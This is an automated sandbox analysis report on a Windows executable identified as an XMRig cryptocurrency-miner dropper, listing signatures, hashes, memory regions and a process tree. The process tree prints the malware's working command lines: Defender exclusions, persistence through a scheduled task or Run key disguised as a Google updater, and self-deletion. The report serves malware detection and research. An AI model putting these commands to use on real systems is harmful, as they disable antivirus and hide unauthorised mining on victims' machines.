Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1799s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3568
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:760
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:3112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:684
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:4456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1096
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:5064
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:4252
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3608
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:2728
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4216
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:3656
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic PATH Win32_VideoController GET Name, VideoProcessor
                3⤵
                • Detects videocard installed
                PID:3320

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            100KB

            MD5

            de21014594ac0a13d27d2e2af1bd8aa3

            SHA1

            02fa5d1d14bf4c1a83ee4b2a5a1c7a135f8d2008

            SHA256

            2678e5bbc6d3ff7b844499d958217f044e9f8bd9013cba9dd5aeb19d8582aa7e

            SHA512

            31183f8ede03c9f1a62400b8cd4ac95d9aeb3db798b80dcc4cc4c29b737acde6da2e86e2ad6c0d6144ae6555961050efa63118824d88323741bd5baaa082f336

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            776KB

            MD5

            8b74adabeec4e36c22f1f7008ca83ec2

            SHA1

            cd02326b090d9b4f8e8912c0140cd23cef4b4694

            SHA256

            0875823f6767079cec5742cb84233de9ff65703992589d644ebd47bcbdc919da

            SHA512

            01d6ce7d54dae69ab20dce4a19765aad11426d59771cddb1e607f5a30f2cfd02a99b03a455b05cc415e4d9fd819930505514896ab1495cce941c71af60c82b2d

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d42b6da621e8df5674e26b799c8e2aa

            SHA1

            ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

            SHA256

            5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

            SHA512

            53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            fb791386d3d6a33d3db1b7b86ec81870

            SHA1

            825ca4d0e36a5a7b5e0999e83dbee02e98354d4e

            SHA256

            966cd46159f04469a27ca23e853c01be0a9f7b91f5656b76e14c0f8b2771da3f

            SHA512

            891996aa2287c50d280cf6329418119564d0e7544803fa152f5cfd89362836e7a0311a9eef8aab4cb6deda563bed34ac36a33c314518c90a6a36065098b92de3

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etlq3t2p.hte.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/684-47-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/684-48-0x00000254F1440000-0x00000254F1450000-memory.dmp
            Filesize

            64KB

          • memory/684-49-0x00000254F1440000-0x00000254F1450000-memory.dmp
            Filesize

            64KB

          • memory/684-52-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/760-29-0x000002B084AB0000-0x000002B084AC0000-memory.dmp
            Filesize

            64KB

          • memory/760-34-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/760-32-0x000002B084AB0000-0x000002B084AC0000-memory.dmp
            Filesize

            64KB

          • memory/760-31-0x000002B084AB0000-0x000002B084AC0000-memory.dmp
            Filesize

            64KB

          • memory/760-30-0x000002B084AB0000-0x000002B084AC0000-memory.dmp
            Filesize

            64KB

          • memory/760-28-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/1096-81-0x00000247CCAD0000-0x00000247CCAD8000-memory.dmp
            Filesize

            32KB

          • memory/1096-77-0x00000247CC970000-0x00000247CC97A000-memory.dmp
            Filesize

            40KB

          • memory/1096-87-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/1096-84-0x00000247B1E60000-0x00000247B1E70000-memory.dmp
            Filesize

            64KB

          • memory/1096-57-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/1096-64-0x00000247B1E60000-0x00000247B1E70000-memory.dmp
            Filesize

            64KB

          • memory/1096-75-0x00000247B1E60000-0x00000247B1E70000-memory.dmp
            Filesize

            64KB

          • memory/1096-74-0x00000247CC890000-0x00000247CC8AC000-memory.dmp
            Filesize

            112KB

          • memory/1096-76-0x00000247CC8B0000-0x00000247CC965000-memory.dmp
            Filesize

            724KB

          • memory/1096-82-0x00000247CCB00000-0x00000247CCB06000-memory.dmp
            Filesize

            24KB

          • memory/1096-78-0x00000247CCAE0000-0x00000247CCAFC000-memory.dmp
            Filesize

            112KB

          • memory/1096-79-0x00000247CCAC0000-0x00000247CCACA000-memory.dmp
            Filesize

            40KB

          • memory/1096-80-0x00000247CCB20000-0x00000247CCB3A000-memory.dmp
            Filesize

            104KB

          • memory/1096-83-0x00000247CCB10000-0x00000247CCB1A000-memory.dmp
            Filesize

            40KB

          • memory/1132-16-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/1132-12-0x000001E5E7000000-0x000001E5E7010000-memory.dmp
            Filesize

            64KB

          • memory/1132-11-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/1132-13-0x000001E5E7000000-0x000001E5E7010000-memory.dmp
            Filesize

            64KB

          • memory/1132-10-0x000001E5E6FA0000-0x000001E5E6FC2000-memory.dmp
            Filesize

            136KB

          • memory/2728-141-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-169-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-187-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-185-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-183-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-181-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-179-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-177-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-175-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-173-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-123-0x0000023D95D20000-0x0000023D95D40000-memory.dmp
            Filesize

            128KB

          • memory/2728-122-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-124-0x0000023DA6230000-0x0000023DA6250000-memory.dmp
            Filesize

            128KB

          • memory/2728-171-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-126-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-127-0x0000023DA6250000-0x0000023DA6270000-memory.dmp
            Filesize

            128KB

          • memory/2728-128-0x0000023DA6270000-0x0000023DA6290000-memory.dmp
            Filesize

            128KB

          • memory/2728-130-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-131-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-165-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-133-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-134-0x0000023DA6250000-0x0000023DA6270000-memory.dmp
            Filesize

            128KB

          • memory/2728-136-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-137-0x0000023DA6270000-0x0000023DA6290000-memory.dmp
            Filesize

            128KB

          • memory/2728-139-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-167-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-143-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-145-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-147-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-149-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-151-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-153-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-155-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-157-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-159-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-161-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/2728-163-0x00007FF645AF0000-0x00007FF6462E4000-memory.dmp
            Filesize

            8.0MB

          • memory/3608-125-0x00007FF6CFDA0000-0x00007FF6CFDB6000-memory.dmp
            Filesize

            88KB

          • memory/3608-132-0x00007FF6CFDA0000-0x00007FF6CFDB6000-memory.dmp
            Filesize

            88KB

          • memory/4216-121-0x00007FF616850000-0x00007FF616A61000-memory.dmp
            Filesize

            2.1MB

          • memory/4216-53-0x00007FF616850000-0x00007FF616A61000-memory.dmp
            Filesize

            2.1MB

          • memory/4712-0-0x00007FF718060000-0x00007FF718271000-memory.dmp
            Filesize

            2.1MB

          • memory/4712-36-0x00007FF718060000-0x00007FF718271000-memory.dmp
            Filesize

            2.1MB

          • memory/5064-98-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/5064-114-0x00007FFE58D30000-0x00007FFE597F1000-memory.dmp
            Filesize

            10.8MB

          • memory/5064-112-0x000001E5D70D0000-0x000001E5D70E0000-memory.dmp
            Filesize

            64KB

          • memory/5064-111-0x000001E5D70D0000-0x000001E5D70E0000-memory.dmp
            Filesize

            64KB

          • memory/5064-101-0x00007FF425C70000-0x00007FF425C80000-memory.dmp
            Filesize

            64KB

          • memory/5064-99-0x000001E5D70D0000-0x000001E5D70E0000-memory.dmp
            Filesize

            64KB